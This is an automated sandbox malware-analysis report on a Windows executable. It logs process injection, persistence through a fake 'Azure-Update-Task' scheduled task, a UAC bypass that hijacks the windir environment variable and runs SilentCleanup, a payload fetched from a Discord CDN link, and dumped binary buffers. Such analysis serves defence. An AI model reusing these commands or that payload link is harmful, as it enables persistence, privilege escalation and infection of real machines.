Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 4, 2021, 6:09 p.m.	June 4, 2021, 6:14 p.m.

Size	674.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`a366fb953227608061d99b578d6a31c1`
SHA256	`daa6210400cb3f6a007ac6fe81873136f1ac25fd915579ee7533cc2f40c942d2`
CRC32	`42CC9291`
ssdeep	`12288:4wZeGjiyhybwk6VAn0+A2NUj4pfIMNFYoOOikhoAOpbAF++n/tA:4sjhyZn4VuIMzsAAbAl/tA`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

cc.exe "C:\Users\test22\AppData\Local\Temp\cc.exe"
2648
- cc.exe "C:\Users\test22\AppData\Local\Temp\cc.exe"
  668
  - schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    2100
- cmd.exe cmd /c ""C:\Users\Public\Trast.bat" "
  2408
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
    2984
    - reg.exe reg delete hkcu\Environment /v windir /f
      1420
    - reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
      2020
    - schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      2388

Name	Response	Post-Analysis Lookup
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.135.233

IP Address	Status	Action
162.159.134.233	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49200 -> 162.159.134.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49201 -> 162.159.134.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49200 162.159.134.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.101:49201 162.159.134.233:443	None	None	None

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW June 4, 2021, 6:12 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW June 4, 2021, 6:12 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (19 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: /min C:\Users\Public\UKO.bat console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: schtasks console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x0000000b	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW June 4, 2021, 6:12 p.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

None

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (1 event)

request

GET https://cdn.discordapp.com/attachments/720918485122940978/850158871501602823/Cdfyxciknlozqdclvjieazyvhyfqdvt

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory June 4, 2021, 6:09 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00510000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory June 4, 2021, 6:09 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73cc2000 process_handle: 0xffffffff	1	0	0

Creates executable files on the filesystem (3 events)

file	C:\Users\Public\KDECO.bat
file	C:\Users\Public\UKO.bat
file	C:\Users\Public\Trast.bat

Creates a suspicious process (3 events)

cmdline	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
cmdline	/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW June 4, 2021, 6:12 p.m.	thread_identifier: 1828 thread_handle: 0x000000ac process_identifier: 2100 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 4, 2021, 6:10 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 77824 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x020a1000 process_handle: 0xffffffff	1	0	0

Yara rule detected in process memory (39 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Steal credential	rule	local_credential_Steal
description	Take ScreenShot	rule	ScreenShot
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
cmdline	reg delete hkcu\Environment /v windir /f
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline	reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

Deletes executed files from disk (1 event)

file	C:\Users\Public\UKO.bat

Potential code injection by writing to the memory of another process (5 events)

Time & API	Arguments	Status	Return
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB`àä @P@l*<@)8 0.text `.rdata @@.data`0@À.reloc@ @B base_address: 0x00400000 process_identifier: 668 process_handle: 0x00000530	1	1
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: Øèú++,+>+J+R+n+G2A/CLP/05/RYS1H9NFqUtQzeA4cJmZDNcvB76bDQxuo92Qk39cHDmev78NtmyeGQs1fDht8U8NKWZbdM7bc1qvlhr9gykz9h2zgskxad0lt2xu9yy4pwscld556LcAjxUppjwEqyNvKeySys3xQZx2dTK6BzSMBW6dhENFT9daN4MkkNCcVRpNnPc9sF5Jqltc1qelyznk4hgm5j6wwr0xfhw8hqwgwyzamsjwfg540xE269734e6C856a5971Ec5146fF5cC491682Ade0e00000L0000T00MON00000000000000000000000LcAjxUppjwEqyNvKeySys3xQZx2dTK6BzS00000000000000W000000085Y45vaBPdTLcfUEVhrrCK3TBedpFFYSwTKyvLYLDuszXkbW6prBw9zU1Wj4zxtrujEp7cwxC7WmyRWWCeH2Vu6rAcX249pD8t9R5NDwSAz1Zv3k1gWthHGGNzxuZufasaddr1q8pmkel9phluj64z7rluua9lyavu06fv9n45dvhcehjaftmwwq9e8x26dymexm7td77xaedzue0prf8xgt733ljlkjfsm8j7czAe2tdPwUPEZDqNhACJ3ZT5NdXjkNffGAwa4Mc9N87udKWYzt1VnFngLMnPEbnb1elmmn9wrrd4fpz9kecjjryuh26pcr3gd7k39u0kernel32.dllLoadLibraryWShlwapi.dllntdll.dllShell32.dllOle32.dllUser32.dllGetProcAddressGetModuleFileNameWCreateDirectoryWGlobalAllocGlobalFreeGlobalLockGlobalUnlockLocalAllocLocalFreelstrlenWStrChrWStrStrWStrStrIWStrToIntExWPathIsDirectoryWCoInitializeHeapFreeCreateMutexACreateMutexWGetLastErrorSHGetFolderPathAPathAppendWStringCbPrintfWmemsetwmemsetmemcpyOpenClipboardGetClipboardDataEmptyClipboardSetClipboardDataCloseClipboard\Microsoft\Network\sqlcmd.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr ""C:\Windows\System32\schtasks.exe0 @8#@x"@@$@%@È!@!@ø#@P @à @ @%@ "@8!@B` ´¸)¸B`GCTL.text$mn 0.idata$50 .rdata¸)´.rdata$zzzdbgl(.idata$2.idata$3¨0.idata$4Ø¶.idata$60`.bss¨`+ Ð+( Øèú++,+>+J+R+n+ÄLoadLibraryW®GetProcAddress×WaitForSingleObjectCloseHandle^ExitProcessåCreateProcessWCopyFileW}Sleep4GlobalFreeKERNEL32.dllXSHGetFolderPathWSHELL32.dll base_address: 0x00402000 process_identifier: 668 process_handle: 0x00000530	1	1
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB`àä @P@l<@)8 0.text `.rdata @@.data`0@À.reloc@ @BUììhà%@ÿ @EüÀTSV5 @Whü%@PÿÖh&@£0@ÿÐh$&@Eøÿ0@h8&@Eðÿ0@hP&@Øÿ0@hd&@øÿ0@hP&@Eôÿ0@h\|&@ÿuüÿÖuüh&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@uøh'@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h'@W£@0@ÿ80@h'@S£,0@ÿ80@h¨'@Vÿ80@uôh´'@V£0@ÿ80@]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃUììðûÿÿVhP3öVÿ0@øýÿÿPVVjVÿ( @Àxfh4(@øýÿÿPÿ0@øýÿÿPÿX0@ÀuVøýÿÿPÿD0@h\(@øýÿÿPÿ0@øýÿÿPðûÿÿPÿT0@Àtøýÿÿè,^ÉÃVøýÿÿPðûÿÿPÿ @øýÿÿè jÿÿ @ÌUììXSVWjD_W3ÛE¨SPñÿ(0@jEì}¨SPÿ(0@Ähj@ÿ0@ºx(@EüMüèºÄ(@Müèºè(@MüèrÖMüèhºø(@Müè[}üEìPE¨PSShSSSWh)@ÿ @ÀuÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì5 @ÿÖÿuðÿÖÿtWÿ00@3À@_^[ÉÃUì3ÀÒtúÿÿÿv¸WÀxHÒt+VW}¾þÿÿ+ò+ùÀt·fÀtfÁêuå_^ÒAþEÁ3ÉÒf¸zEÁë Òt3Òf]ÂUìQSVWjl[òùj1Xf9¤Vÿ 0@ø"j0Vÿ0@ÀjOVÿ0@ÀuvjIVÿ0@ÀuiSVÿ0@Àu]Vÿ7ÿT0@ØÛtKÓ+ÑúRèºP @YMüEüèûVÿ 0@MüCèé?tÿ7ÿ @Eü3À@éýjl[f>3ufVÿ 0@ø"uZj0Vÿ0@ÀuMjOVÿ0@Àu@jIVÿ0@Àu3SVÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRèàº @éYÿÿÿVÿ 0@jcYjb[øu[f9uVf9NuPj1Xf9FuGjO^Sÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRèvºà @éïþÿÿjb[Vÿ 0@øu^f9uYf~nuRf9^uLj1^Xf9uAjOSÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè º%@éþÿÿf>LuiVÿ 0@ø"u]j0Vÿ0@ÀuPjOVÿ0@ÀuCjIVÿ0@jl[Àu6SVÿ0@ÀuVÿ7ÿT0@ØÛtÓ+ÑúRèº8!@éþÿÿjl[f>MufVÿ 0@ø"uZj0Vÿ0@ÀuMjOVÿ0@Àu@jIVÿ0@Àu3SVÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè+º!@é¤ýÿÿVÿ 0@ø+udjlXf9u\f~tuUjcXf9FuLj1^Xf9uAjOSÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè»ºÈ!@é4ýÿÿÎèêÀt'Vÿ7ÿT0@ØÛtÓ+ÑúRèº base_address: 0x00403000 process_identifier: 668 process_handle: 0x00000530		0
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: Ü0 0 0&0.030:0C0H0Q0V0^0c0k0p0y0~00000¤0©0¯0µ0º0À0Æ0Ë0Ñ0×0Ü0â0è0í0ó0ù0þ01 1111#1)1/141:1@1E1K1Q1V1]1b1i1n1t1z111111¡1¦1¬1²1·1½1Ã1È1Ï1×1Ý1ã1ë1ò1÷1ý122222 2%2+21262<2B2G2M2S2X2^2d2k222¨2µ2Â2Ô2Ù2æ2ú2!343Q3a3q3v333ª3Í3Ó3â3ñ3ú34¤4¶4Ç4Ô4à4í45515N5\5i5v555¨5´5ß5ì5ù56!6L6Y6f6666¬6¹6È6Õ6î6777+777D7]7i77§7´7Í7æ7ÿ7818J8c8\|88¡8Ô8í8ù8949U9`9g9q9y99999®9»9È9Õ9Û9ó9ý9::5:G:³:õ:;9;C;S;^;)<6<G<h<<Ï<û<y==¢=>>>(>=>>©>¶>Ã>å>v???? $D9H9L9P9T9X9\9`9d9h9l9p9t9x9 base_address: 0x00404000 process_identifier: 668 process_handle: 0x00000530	1	1
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 668 process_handle: 0x00000530	1	1

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB`àä @P@l*<@)8 0.text `.rdata @@.data`0@À.reloc@ @B base_address: 0x00400000 process_identifier: 668 process_handle: 0x00000530	1	1	0
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB`àä @P@l<@)8 0.text `.rdata @@.data`0@À.reloc@ @BUììhà%@ÿ @EüÀTSV5 @Whü%@PÿÖh&@£0@ÿÐh$&@Eøÿ0@h8&@Eðÿ0@hP&@Øÿ0@hd&@øÿ0@hP&@Eôÿ0@h\|&@ÿuüÿÖuüh&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@uøh'@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h'@W£@0@ÿ80@h'@S£,0@ÿ80@h¨'@Vÿ80@uôh´'@V£0@ÿ80@]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃUììðûÿÿVhP3öVÿ0@øýÿÿPVVjVÿ( @Àxfh4(@øýÿÿPÿ0@øýÿÿPÿX0@ÀuVøýÿÿPÿD0@h\(@øýÿÿPÿ0@øýÿÿPðûÿÿPÿT0@Àtøýÿÿè,^ÉÃVøýÿÿPðûÿÿPÿ @øýÿÿè jÿÿ @ÌUììXSVWjD_W3ÛE¨SPñÿ(0@jEì}¨SPÿ(0@Ähj@ÿ0@ºx(@EüMüèºÄ(@Müèºè(@MüèrÖMüèhºø(@Müè[}üEìPE¨PSShSSSWh)@ÿ @ÀuÿtWÿ00@3Àë)jÿÿuìÿ @ÿuì5 @ÿÖÿuðÿÖÿtWÿ00@3À@_^[ÉÃUì3ÀÒtúÿÿÿv¸WÀxHÒt+VW}¾þÿÿ+ò+ùÀt·fÀtfÁêuå_^ÒAþEÁ3ÉÒf¸zEÁë Òt3Òf]ÂUìQSVWjl[òùj1Xf9¤Vÿ 0@ø"j0Vÿ0@ÀjOVÿ0@ÀuvjIVÿ0@ÀuiSVÿ0@Àu]Vÿ7ÿT0@ØÛtKÓ+ÑúRèºP @YMüEüèûVÿ 0@MüCèé?tÿ7ÿ @Eü3À@éýjl[f>3ufVÿ 0@ø"uZj0Vÿ0@ÀuMjOVÿ0@Àu@jIVÿ0@Àu3SVÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRèàº @éYÿÿÿVÿ 0@jcYjb[øu[f9uVf9NuPj1Xf9FuGjO^Sÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRèvºà @éïþÿÿjb[Vÿ 0@øu^f9uYf~nuRf9^uLj1^Xf9uAjOSÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè º%@éþÿÿf>LuiVÿ 0@ø"u]j0Vÿ0@ÀuPjOVÿ0@ÀuCjIVÿ0@jl[Àu6SVÿ0@ÀuVÿ7ÿT0@ØÛtÓ+ÑúRèº8!@éþÿÿjl[f>MufVÿ 0@ø"uZj0Vÿ0@ÀuMjOVÿ0@Àu@jIVÿ0@Àu3SVÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè+º!@é¤ýÿÿVÿ 0@ø+udjlXf9u\f~tuUjcXf9FuLj1^Xf9uAjOSÿ0@Àu4jISÿ0@Àu'Vÿ7ÿT0@ØÛtÓ+ÑúRè»ºÈ!@é4ýÿÿÎèêÀt'Vÿ7ÿT0@ØÛtÓ+ÑúRèº base_address: 0x00403000 process_identifier: 668 process_handle: 0x00000530		0	0

Network activity contains more than one unique useragent (2 events)

process	cc.exe				useragent	zipo
process	cc.exe				useragent	daso

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2648 called NtSetContextThread to modify thread in remote process 668
NtSetContextThread June 4, 2021, 6:10 p.m.	registers.eip: 5348 registers.esp: 68586792 registers.edi: 0 registers.eax: 4200932 registers.ebp: 5344 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000052c process_identifier: 668	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2648 resumed a thread in remote process 668
Process injection	Process 2408 resumed a thread in remote process 2984
NtResumeThread June 4, 2021, 6:10 p.m.	thread_handle: 0x0000052c suspend_count: 1 process_identifier: 668	1	0	0
NtResumeThread June 4, 2021, 6:12 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2984	1	0	0

Executed a process and injected code into it, probably while unpacking (19 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW June 4, 2021, 6:10 p.m.	thread_identifier: 2760 thread_handle: 0x0000052c process_identifier: 668 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\cc.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\cc.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000530	1	1
NtGetContextThread June 4, 2021, 6:10 p.m.	thread_handle: 0x0000052c	1	0
NtUnmapViewOfSection June 4, 2021, 6:10 p.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 668 process_handle: 0x00000530	1	0
NtAllocateVirtualMemory June 4, 2021, 6:10 p.m.	process_identifier: 668 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000530	1	0
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB`àä @P@l*<@)8 0.text `.rdata @@.data`0@À.reloc@ @B base_address: 0x00400000 process_identifier: 668 process_handle: 0x00000530	1	1
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: base_address: 0x00401000 process_identifier: 668 process_handle: 0x00000530	1	1
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: Øèú++,+>+J+R+n+G2A/CLP/05/RYS1H9NFqUtQzeA4cJmZDNcvB76bDQxuo92Qk39cHDmev78NtmyeGQs1fDht8U8NKWZbdM7bc1qvlhr9gykz9h2zgskxad0lt2xu9yy4pwscld556LcAjxUppjwEqyNvKeySys3xQZx2dTK6BzSMBW6dhENFT9daN4MkkNCcVRpNnPc9sF5Jqltc1qelyznk4hgm5j6wwr0xfhw8hqwgwyzamsjwfg540xE269734e6C856a5971Ec5146fF5cC491682Ade0e00000L0000T00MON00000000000000000000000LcAjxUppjwEqyNvKeySys3xQZx2dTK6BzS00000000000000W000000085Y45vaBPdTLcfUEVhrrCK3TBedpFFYSwTKyvLYLDuszXkbW6prBw9zU1Wj4zxtrujEp7cwxC7WmyRWWCeH2Vu6rAcX249pD8t9R5NDwSAz1Zv3k1gWthHGGNzxuZufasaddr1q8pmkel9phluj64z7rluua9lyavu06fv9n45dvhcehjaftmwwq9e8x26dymexm7td77xaedzue0prf8xgt733ljlkjfsm8j7czAe2tdPwUPEZDqNhACJ3ZT5NdXjkNffGAwa4Mc9N87udKWYzt1VnFngLMnPEbnb1elmmn9wrrd4fpz9kecjjryuh26pcr3gd7k39u0kernel32.dllLoadLibraryWShlwapi.dllntdll.dllShell32.dllOle32.dllUser32.dllGetProcAddressGetModuleFileNameWCreateDirectoryWGlobalAllocGlobalFreeGlobalLockGlobalUnlockLocalAllocLocalFreelstrlenWStrChrWStrStrWStrStrIWStrToIntExWPathIsDirectoryWCoInitializeHeapFreeCreateMutexACreateMutexWGetLastErrorSHGetFolderPathAPathAppendWStringCbPrintfWmemsetwmemsetmemcpyOpenClipboardGetClipboardDataEmptyClipboardSetClipboardDataCloseClipboard\Microsoft\Network\sqlcmd.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr ""C:\Windows\System32\schtasks.exe0 @8#@x"@@$@%@È!@!@ø#@P @à @ @%@ "@8!@B` ´¸)¸B`GCTL.text$mn 0.idata$50 .rdata¸)´.rdata$zzzdbgl(.idata$2.idata$3¨0.idata$4Ø¶.idata$60`.bss¨`+ Ð+( Øèú++,+>+J+R+n+ÄLoadLibraryW®GetProcAddress×WaitForSingleObjectCloseHandle^ExitProcessåCreateProcessWCopyFileW}Sleep4GlobalFreeKERNEL32.dllXSHGetFolderPathWSHELL32.dll base_address: 0x00402000 process_identifier: 668 process_handle: 0x00000530	1	1
WriteProcessMemory June 4, 2021, 6:10 p.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $±Àõï®Ïõï®Ïõï®Ï®¯Îðï®Ïõï¯Ïÿï®Ïo§Îðï®Ïo¬Îôï®ÏRichõï®ÏPELB`àä @P@l<@)8 0.text `.rdata @@.data`0@À.reloc@ @BUììhà%@ÿ @EüÀTSV5 @Whü%@PÿÖh&@£0@ÿÐh$&@Eøÿ0@h8&@Eðÿ0@hP&@Øÿ0@hd&@øÿ0@hP&@Eôÿ0@h\|&@ÿuüÿÖuüh&@V£80@ÿÐh &@V£0@ÿ80@h´&@V£D0@ÿ80@hÀ&@V£$0@ÿ80@hÌ&@V£<0@ÿ80@hØ&@V£0@ÿ80@hè&@V£40@ÿ80@hô&@V£0@ÿ80@h'@V£00@ÿ80@uøh'@V£ 0@ÿ80@h'@V£0@ÿ80@h'@V£T0@ÿ80@h('@Vÿ80@h4'@Vÿ80@hH'@W£X0@ÿ80@}ühX'@Wÿ80@hd'@Wÿ80@ht'@Wÿ80@h'@W£@0@ÿ80@h'@S£,0@ÿ80@h¨'@Vÿ80@uôh´'@V£0@ÿ80@]ðhÄ'@Sÿ80@hÌ'@S£(0@ÿ80@hÔ'@Sÿ80@hÜ'@V£0@ÿ80@hì'@V£H0@ÿ80@h(@V£\0@ÿ80@h(@V£0@ÿ80@h$(@V£P0@ÿ80@_^£L0@[ÉÃUììðûÿÿVhP3öVÿ0@øýÿÿPVVjVÿ( @Àxfh4(@øýÿÿPÿ0@øýÿÿPÿX0@ÀuVøýÿÿPÿD0@h\(@øýÿÿPÿ0@øýÿÿPðûÿÿPÿT0@Àtøýÿÿè,^ÉÃVøýÿÿPðûÿÿPÿ @øýÿÿè jÿÿ 